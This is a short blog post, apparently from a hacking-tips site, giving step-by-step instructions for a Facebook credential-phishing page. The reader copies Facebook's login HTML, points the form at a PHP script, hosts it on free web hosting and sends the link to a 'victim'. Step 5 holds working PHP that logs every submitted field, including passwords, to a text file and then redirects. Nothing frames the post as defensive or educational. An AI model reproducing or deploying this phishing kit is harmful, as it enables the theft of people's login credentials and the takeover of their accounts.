How to Hack Facebook Accounts

by 10:53 0 comments



STEP 1:
     Create your own website. 
     Free hosting sites: http://www.000webhost.com
                                   http://www.my3gb.com/
                                   
STEP 2:
    Copy facebook homepage html.

STEP 3:
     Save it as index.html

STEP 4:
     Find the word action in the index file and replace the link with "anonymous.php" .

STEP 5:
     <?php
header ('Location: give any link where you want the victim to visit after logging in');
$handle = fopen("anonymous.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Save it as " anonymous.php" .

STEP 6:
     Create a text file naming "anonymous.txt" .

STEP 7:
     It would be better to create a "robots.txt" file.

STEP 8:
     Upload these files in your  website. 
     And give the link of your website to your victim to sign in.




Unknown

Developer

Thanks for visiting.

0 comments:

Post a Comment